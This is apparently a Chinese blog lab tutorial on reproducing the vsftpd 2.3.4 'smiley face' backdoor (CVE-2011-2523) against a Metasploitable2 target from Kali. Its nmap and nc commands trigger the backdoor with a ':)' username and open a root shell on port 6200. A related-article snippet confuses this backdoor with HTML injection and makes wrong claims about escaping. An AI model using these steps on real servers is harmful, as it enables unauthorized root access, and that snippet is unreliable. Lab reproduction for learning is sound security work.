如何复现笑脸漏洞

最新推荐文章于 2024-12-12 07:00:00 发布
最新推荐文章于 2024-12-12 07:00:00 发布
阅读量682 收藏 14
点赞数 8
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/v10_24/article/details/143384778
版权

如何复现笑脸漏洞

文章目录

前言

本文将展示如何复现笑脸漏洞。

提示:以下是本篇文章正文内容,下面案例可供参考

一、笑脸漏洞是什么是什么?

VSFTPD 2.3.4的“笑脸漏洞”是一个严重的安全漏洞,发现于2011年。其CVE编号为CVE-2011-2523。

二、实验工具

1.攻击机

Kali(192.168.164.128)

2.靶机

metasploitable2

二、实验步骤

1.查看攻击机ip

打开终端输入ifconfig
插入图片发生描述
得到攻击机ip 为192.168.164.128

2.查看同一子网下的靶机ip

使用nmap,输入nmap 192.168.164.24/0,得到靶机的ip地址
在这里插入图片描述为
得到靶机ip为192.168.164.129

3.查看靶机端口开放情况

使用nmap 进行扫描,输入 nmap 192.168.164.129
在这里插入图片描述
我们可以发现21端口是打开的,由于21端口是提供ftp服务的,输入nmap -sV 192.168.164.129,可以得到其ftp版本为vsftpd 2.3.4,可知其存在笑脸漏洞。

3.连接21端口

在终端中打开NetCat。输入nc 192.168.164.129 21
然后再输入user a:),接着输入 pass 密码,user 名称 :)中的名称可以任意输入,pass 中的密码同理。在这里插入图片描述

随后便已经连接成功.
接着我们再次查看6200端口是否已经打开,
我们输入nmap -p 6200 192.168.164.129,发现其已经成功打开
在这里插入图片描述

4.获取靶机root权限

通过6200端口,输入nc 192.168.164.129 6200
whoami即可
在这里插入图片描述

v10_24
关注
VulnHub Metasploitable-2
人若无名,便可专心练剑
10-28 341
【代码】VulnHub Metasploitable-2。
Ftp笑脸漏洞复现(后门漏洞
qq_55857040的博客
12-13 6030
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
FTP协议简单分析既历史漏洞介绍
南迪叶先森
06-30 1500
来源:https://www.freebuf.com/vuls/272975.html 话说在前面 节日在家无聊看完了kali linux2这本书,对书中一些知识比较感兴趣,于是才有了这篇文章。 协议介绍 FTP(File Transfer Protocol)文件传输协议,在TCP/IP协议族中属于应用层协议运行于TCP协议之上是一种可靠的传输协议,主要功能用于实现用户间文件分发共享,以及网络管理者在进行设备版本升级、日志下载和配置保存等业务操作时,均会使用到FTP功能。ftp协议是采用C/S结构。也就.
端口漏洞之21(FTP)
初岄的博客
10-12 5084
FTP 是 File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文件传输协议”。用于 Internet 上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的 FTP 应用程序,而所有这些应用程序都遵守同一种协议用以传输文件。在 FTP 的使用当中,用户经常遇到两个概念:“下载”(Download)和 “上传”(Upload)。“下载”文件就是从远程主机拷贝文件至自己的计算机上;
vsftpd 2.3.4 带漏洞版本 可复现
09-26
vsftpd 2.3.4 带笑脸漏洞版本 可复现
深入解析 vsftpd 2.3.4 的笑脸漏洞及其检测方法
最新发布
Liu_Bruce的博客
12-12 1034
漏洞编号影响版本漏洞描述: 当用户使用包含:)字符序列的用户名进行登录时,会触发一个隐藏的后门,导致远程代码执行。具体来说,如果用户名为:)并且密码为任意值,服务器会在端口 6200 上启动一个 shell,攻击者可以通过该端口进行远程控制。靶机为Metasploit:系统 Ubuntu, IP 192.168.1.32。
笑脸漏洞复现
qq_62270288的博客
10-24 364
渗透测试实验笑脸漏洞复现
VSFTPD2.3.4笑脸漏洞复现
m0_60466340的博客
12-11 1150
vsftpd2.3.4版本中有一个后门 ,在检测到用户名带有特殊字符:)时,会自动打开6200端口。 复现过程: 用nmap扫面本网段内的主机,发现有打开21端口,用于传输ftp的主机 探测该主机的ftp服务器版本信息,可以看到该版本是存在笑脸漏洞的版本 用netcat连接该主机的21端口,输入带有:)的用户名,和随便一个password 这时候就是以root的权限登录了,可以通过netcat查看6200端口的用户信息 ...
笑脸漏洞网络安全实例
qq_64539221的博客
11-29 693
笑脸漏洞是存在于vsftpd(Very Secure FTP Daemon)2.3.4版本中的一个严重安全漏洞。该漏洞允许攻击者在登录时,通过在用户名后输入特殊字符:)(类似笑脸的符号),从而触发漏洞。当输入这个特殊字符时,vsftpd服务会在目标系统上开启一个监听在6200端口的后门,攻击者可以利用这个后门直接执行系统命令。这可能导致未经授权的远程访问和潜在的恶意操作。
基于python下的复现vsftpd2.3.4(笑脸漏洞
xinyue_924的博客
10-28 415
类型:远程代码执行漏洞影响版本漏洞描述:该漏洞允许攻击者通过特殊构造的FTP请求在服务器上执行任意代码。具体而言,攻击者可以利用一个包含恶意代码的特殊用户名称来触发一个回调,这个回调可以导致执行任意代码。
笑脸漏洞vsftpd-2.3.4
inskeyzh的博客
11-12 4173
一、介绍 vsftpd存在一个后门漏洞,虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。 vsftpd程序服务端会接收来自用户输入的用户名和密码,只要用户输入的用户名中包含连续的“:”和“)”字符,就会自动在6200端口打开一个后门。 二、准备 1.kali主机 2.靶机Metasploitable2-Linux 如未安装好以上虚拟机,可参考以下链接 Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教
nmap验证检测漏洞命令
晚风不及你
09-03 4055
nmap验证检测漏洞命令1 http 拒绝服务2 IIS 短文件泄露3 检测CVE-2011-2523中的ftp-vsftpd-backdoor4 验证HTTP.sys 远程代码执行5验证 SSL POODLE information leak6 验证mysql 匿名访问7 验证cve2015-1427 漏洞8 验证cve2014-8877漏洞9 验证Cisco ASA中的CVE-2014-2126/2127/21/2129漏洞10 验证低安全的 SSHv1,sslv2协议11 验证CVE-2014-022
五、Kali Linux 2 漏洞扫描技术
m0_55313512的博客
02-19 3647
Kali Linux 网络渗透测试
使用nmap 进行多种安全评估
热门推荐
煜铭2011
03-25 3万+
本文主要介绍漏洞扫描和渗透测试中会经常遇到的一些漏洞,并且尝试使用namp 对这些被扫描工具扫描出来的漏洞进行人工手动验证
cve-2011-0027漏洞分析
小强的博客
07-25 2199
这个漏洞是整数溢出漏洞漏洞环境为win7+IE8 ,调试工具为windbg,静态分析工具为IDA。 主要参考《漏洞战争》相关介绍,实际分析了一下。 首先启动页堆。 打开IE8,windbg附加进程,然后IE打开poc文件。 poc.html文件如下: function Start() { localxmlid1 = document.getElementById
Linux解决CVE-2011-0762漏洞vsftpd升级步骤
lixinfu1980的博客
05-23 1万+
Linux解决CVE-2011-0762漏洞vsftpd升级步骤操作系统版本:RHEL 6.8 64位vsftpd 升级到3.0.3关闭服务 service vsftpd stop service iptables stop sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config; 检查旧版vsftpd 版本 vsft...
vsftpd升级解决远程拒绝服务漏洞
CheerTan is here
06-11 4111
参考链接:https://blog.csdn.net/DBDeep/article/details/63037691 最新版下载链接:https://security.appspot.com/vsftpd.html#download 文中的8,9二步我并没有执行,另外其实在编译安装后,查看版本时就已经变成了3.0.3了,在用rpm -e卸载时,rpm会自动保存一个配置文件在/etc下,文件名后缀为...
笑脸漏洞—的简单操作
qq_53639387的博客
11-11 2570
1.首先我们需要在我们的虚拟机上安装Metasploitable2虚拟系统。 进去的虚拟系统启动之后,使用用户名msfadmin,和密码msfadmin登陆 2.接下来我们需要查看IP地址,使用ifconfig命令执行 3.知道了靶机上IP,接下来在kali端打开Metasploitable2,使用nmap 靶机IP地址扫描 4. ...
笑脸漏洞(VSFTPD2.3.4)复现
aarong的博客
11-01 9749
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
笑脸漏洞检测代码python
10-17
笑脸漏洞(Smile Bug),又称为“笑脸表情”注入攻击,是一种利用HTML特殊字符绕过输入验证的安全漏洞。在Python中,为了避免这种漏洞,我们需要对用户输入的数据进行适当的清理和转义。 以下是一个简单的例子,展示如何使用Python的`html.escape()`函数来处理用户提交的笑脸表情: ```python from html import escape def process_input(input_string): # 将笑脸表情转义为实体形式 clean_input = escape(input_string) # 如果需要进一步检查,可以尝试解析并检查特定标签 if '<img' in clean_input: print("Potential smiley bug detected. Check the input for HTML injection.") else: safe_output = clean_input.replace('>', '>').replace('<', '<') # 只保留安全的HTML实体 return safe_output # 示例用户输入 user_face = ":)" processed_face = process_input(user_face) print(f"Processed input: {processed_face}") ``` 在这个例子中,我们首先使用`escape()`函数将笑脸表情转换成`&#128517;`等实体形式,然后再检查是否包含可能导致漏洞的HTML标记。如果发现有潜在的风险,就需要采取更严格的验证措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值